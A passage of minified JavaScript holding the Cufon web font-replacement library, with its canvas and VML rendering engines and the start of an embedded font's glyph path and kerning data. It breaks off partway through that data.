var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"34,-187r0,121v0,42,41,57,75,57v34,0,74,-15,74,-57r0,-121v0,-42,-40,-56,-74,-56v-34,0,-75,14,-75,56xm197,-66v-3,95,-177,95,-177,0r0,-121v3,-94,177,-95,177,0r0,121","w":216},{"d":"19,-220r-8,-8v40,-49,141,-32,141,43v0,45,-36,68,-74,75v-1,18,-2,50,-3,69r-11,0r-2,-80v40,-1,77,-25,76,-65v-2,-62,-84,-70,-119,-34xm70,-25v7,0,13,5,13,13v0,8,-6,14,-13,14v-8,0,-13,-6,-13,-14v0,-8,5,-13,13,-13","w":169},{"d":"10,-8r162,-234r-154,0r0,-13r166,0r8,8r-162,234r156,0r0,13r-170,0","w":202,"k":{"u":4,"o":8,"e":11,"c":8,"a":7,"w":11,"v":12,"g":4,"d":4,"Q":8,"O":4,"L":8,"K":8}},{"d":"29,-157v0,-8,5,-13,13,-13v8,0,14,5,14,13v0,8,-6,14,-14,14v-8,0,-13,-6,-13,-14xm29,-21v0,-8,5,-13,13,-13v8,0,14,5,14,13v0,8,-6,14,-14,14v-8,0,-13,-6,-13,-14","w":86},{"d":"42,0r-13,0r0,-177v51,-21,133,-21,133,43r0,134r-13,0r0,-134v0,-53,-73,-47,-107,-32r0,166","w":191,"k":{"y":4,"e":4,"Y":30,"v":8,"t":4,"n":8,"W":11,"V":19,"U":8,"T":45}},{"d":"46,-14r128,0r0,14r-142,0r0,-255r14,0r0,241","w":182,"k":{"z":-11,"v":22,"t":8,"Z":-4,"W":20,"V":33,"T":53,"C":8,"\u2019":40,"Y":40,"y":13,"c":7,"e":8,"o":11,"u":11,"A":-7,"a":4}},{"d":"37,-196v-5,84,167,36,158,134v-7,80,-142,85,-174,21r12,-6v28,50,143,54,148,-15v7,-91,-163,-37,-158,-135v4,-78,141,-79,170,-19v-5,3,-7,4,-12,6v-25,-48,-140,-54,-144,14","w":214,"k":{"Y":4,"w":15,"v":15,"l":4,"h":4,"G":-4}},{"d":"26,-131v1,-38,31,-62,73,-56r0,12v-34,-3,-59,13,-60,44r0,131r-13,0r0,-131","w":110,"k":{"o":8,"e":6,"c":6,"a":12,"A":15,"r":4,"q":6,"k":4,"g":6,"d":6,"T":22,".":22,"-":20,",":33}},{"d":"26,-240v0,-7,5,-12,12,-12v7,0,13,5,13,12v0,7,-6,13,-13,13v-7,0,-12,-6,-12,-13xm32,0r0,-187r13,0r0,187r-13,0","w":77,"k":{"J":-11}},{"d":"32,-255r152,0r0,14r-138,0r0,111r124,0r0,14r-124,0r0,116r-14,0r0,-255","w":196,"k":{"y":11,"u":8,"o":12,"i":8,"e":15,"c":8,"a":19,"A":26,"x":8,"w":4,"v":8,"q":12,"m":15,"l":4,"k":12,"j":8,"h":8,"g":11,"d":7,"Q":8,"O":8,"J":34,".":46,",":46}},{"d":"4,23r0,-13r172,0r0,13r-172,0","w":180},{"d":"30,-255r24,40r-13,0r-32,-40r21,0","w":75},{"d":"31,-73r0,-182r14,0r0,182v0,82,156,81,156,0r0,-182r14,0r0,182v0,101,-184,101,-184,0","w":246,"k":{"o":8,"i":7,"e":8,"a":11,"A":11,"v":4,"r":8,"p":4,"n":8,"l":8,"k":4,"h":4,"f":8,"K":8}},{"d":"32,-15v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17xm107,-15v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17xm182,-15v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17xm28,-15v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21xm35,-15v0,8,6,14,14,14v8,0,14,-6,14,-14v0,-8,-6,-14,-14,-14v-8,0,-14,6,-14,14xm103,-15v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21xm111,-15v0,8,5,14,13,14v8,0,14,-6,14,-14v0,-8,-6,-14,-14,-14v-8,0,-13,6,-13,14xm178,-15v0,-12,9,-21,21,-21v12,0,21,9,21,21v0,12,-9,21,-21,21v-12,0,-21,-9,-21,-21xm185,-15v0,8,6,14,14,14v8,0,14,-6,14,-14v0,-8,-6,-14,-14,-14v-8,0,-14,6,-14,14","w":252},{"d":"30,-140v0,62,110,19,108,90v-3,65,-99,66,-125,18r10,-7v15,21,35,30,57,29v20,0,46,-13,46,-40v0,-62,-108,-21,-108,-90v0,-57,81,-63,111,-30r-8,9v-25,-27,-91,-24,-91,21","w":151,"k":{"Y":22,"V":8,"T":45,"J":-4,"G":-4}},{"d":"160,-57r11,-7r21,27v27,-31,14,-94,14,-145v0,-82,-166,-82,-166,0r0,109v1,62,93,77,141,45xm220,-182v0,56,12,129,-20,157r18,21v-5,3,-8,5,-12,8r-16,-21v-57,37,-163,19,-164,-56r0,-109v0,-50,48,-74,97,-74v49,0,97,24,97,74","w":245,"k":{"Y":19,"V":8,"T":15,"G":-4}},{"d":"206,-183v0,58,-36,72,-89,71r85,112r-16,0r-86,-112r-54,0r0,112r-14,0r0,-255v82,0,174,-14,174,72xm46,-124v67,-1,146,15,146,-59v0,-73,-78,-56,-146,-58r0,117","w":224,"k":{"u":4,"o":8,"i":4,"e":8,"c":8,"a":8,"Y":5,"q":8,"g":8,"d":8,"T":7}},{"d":"82,-257r0,13v-44,-1,-46,43,-43,89r41,0r0,13r-41,0r0,142r-13,0r0,-200v0,-37,24,-56,56,-57","w":94,"k":{"x":4,"r":4,"j":4,"h":-4,"f":6,"d":8,"\u2019":-6,"o":4,"a":8,"i":5}},{"d":"205,-71v0,83,-92,71,-173,71r0,-255v81,0,173,-13,173,71r0,113xm46,-241r0,227v0,0,145,11,145,-57r0,-113v0,-68,-78,-57,-145,-57","w":223,"k":{"o":-4,"e":-4,"n":-4,"h":-4,"X":8}},{"d":"202,0r0,-120r-156,0r0,120r-14,0r0,-255r14,0r0,121r156,0r0,-121r14,0r0,255r-14,0","w":247,"k":{"a":4,"g":4,"d":8,"Q":4}},{"d":"45,-242r0,101v61,-2,139,15,138,-51v0,-65,-77,-48,-138,-50xm194,-69v0,-74,-80,-59,-149,-60r0,115v67,-3,149,19,149,-55xm159,-135v35,5,50,39,49,66v-2,86,-96,67,-177,69r0,-255v75,1,165,-15,165,63v1,23,-11,51,-37,57","w":226,"k":{"c":4,"a":3,"v":4,"j":4,"h":4,"F":4,"E":4}},{"d":"143,-96v7,-49,-11,-79,-54,-79v-43,0,-61,30,-54,79r108,0xm156,-84r-121,0v-18,73,69,95,103,49r12,7v-27,48,-128,39,-128,-27r0,-76v1,-76,133,-76,134,0r0,47","w":176,"k":{"u":4,"c":2,"a":4,"Y":26,"x":7,"v":4,"n":2,"j":4,"h":2,"X":8,"W":8,"V":19,"T":41}},{"d":"6,47r0,-13r33,0r0,-293r-33,0r0,-13r47,0r0,319r-47,0","w":75},{"d":"141,-187r0,16r-108,62r108,61r0,16r-120,-71r0,-13","w":167},{"d":"179,-255r17,0r-86,154r0,101r-14,0r0,-101r-86,-154r16,0r77,142","w":205,"k":{"z":19,"v":20,"r":30,"q":33,"p":26,"n":30,"m":30,"k":8,"j":15,"h":11,"g":30,"f":15,"d":30,"S":15,"Q":15,"O":15,"L":12,"K":12,"J":26,"G":12,"F":12,"C":11,";":33,":":33,".":36,"-":40,",":44,"c":33,"e":26,"o":33,"u":27,"A":34,"a":33,"i":11,"s":30}},{"d":"145,-132v-1,-60,-109,-59,-109,0r0,78v1,59,109,60,109,0r0,-78xm23,-54r0,-78v1,-76,134,-76,135,0r0,78v-1,76,-134,76,-135,0","k":{"u":4,"o":7,"c":4,"a":4,"Y":30,"x":4,"r":4,"m":4,"Z":8,"X":11,"W":11,"V":15,"T":41,"N":4,"D":7}},{"w":108},{"d":"12,-259r0,-12v82,-16,9,131,68,153r0,11v-58,10,19,158,-68,151r0,-13v43,7,29,-46,29,-81v0,-48,18,-59,23,-63v-20,0,-26,-75,-23,-115v1,-25,-5,-33,-29,-31","w":100},{"d":"69,-127v23,0,39,24,61,24v15,0,24,-11,32,-23r7,6v-8,15,-21,29,-39,29v-24,1,-41,-25,-62,-25v-15,0,-23,10,-32,23v-3,-3,-4,-5,-7,-7v8,-13,20,-27,40,-27","w":194},{"d":"19,43r-11,-7v62,-92,56,-212,-1,-302v4,-3,7,-5,11,-7v63,90,66,223,1,316","w":91},{"d":"181,-255r16,0r-84,128r85,127r-17,0r-76,-117r-77,117r-16,0r84,-127r-84,-128r16,0r77,116","w":212,"k":{"y":8,"u":8,"o":11,"e":12,"c":12,"a":12,"q":12,"d":12,"Q":15,"K":15,"G":12,"F":11,"E":11,"D":8,"B":8}},{"d":"75,-186r16,-69r18,0r-21,69r-13,0xm31,-186r16,-69r18,0r-21,69r-13,0","w":138},{"d":"125,-99r-79,0r0,99r-14,0r0,-255r93,0v107,1,108,155,0,156xm46,-113r79,0v90,0,88,-127,0,-128r-79,0r0,128","w":221,"k":{"y":4,"u":8,"s":7,"o":14,"e":8,"c":8,"a":19,"Y":11,"A":33,"t":8,"r":15,"n":4,"m":8,"l":4,"h":4,"g":8,"f":11,"d":11,"Z":11,"T":8,"K":8,"J":26,".":55,",":55}},{"d":"80,-255r0,55v17,-5,35,-11,52,-17r4,10r-54,17r35,46v-3,3,-5,4,-8,6r-35,-46r-33,46v-3,-2,-5,-4,-8,-6r34,-47r-55,-17v1,-4,2,-7,3,-10r55,18r-1,-55r11,0","w":149},{"w":108},{"d":"22,-186r20,-69r19,0v-9,26,-17,43,-26,69r-13,0","w":82,"k":{"s":34,"t":4,"m":15,"d":23,"\u2019":31}},{"d":"9,-10r118,-164r-112,0r0,-12r125,0r5,8r-119,165r118,0r0,13r-129,0","w":157,"k":{"u":4,"o":4,"e":4,"c":4,"a":7,"t":4,"q":8,"d":4,"T":19}},{"d":"30,-193v-2,36,29,45,65,53r0,-103v-33,3,-63,20,-65,50xm171,-212v-13,-23,-36,-30,-66,-31r0,105v42,7,87,19,83,74v-3,39,-42,62,-83,65r0,36r-10,